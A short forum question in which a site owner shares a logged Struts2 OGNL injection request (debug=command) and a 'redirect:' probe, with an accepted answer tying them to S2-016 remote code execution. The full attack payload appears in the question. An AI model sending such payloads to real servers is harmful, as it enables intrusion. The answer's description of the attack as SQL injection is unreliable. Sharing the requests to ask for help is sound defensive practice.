# Attacked site WordPress

Tags: java, wordpress

today i've logged in and see it for the 1st time:

```
mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()
```

after that another one:

`mysite.com/?redirect:`

what can it cause? Injection databse? Virus?

Answer (score 1, accepted):

It looks like someone is trying exploit an SQL injection vulnerability in struts2 in order to perform remote code execution.

See http://struts.apache.org/docs/s2-016.html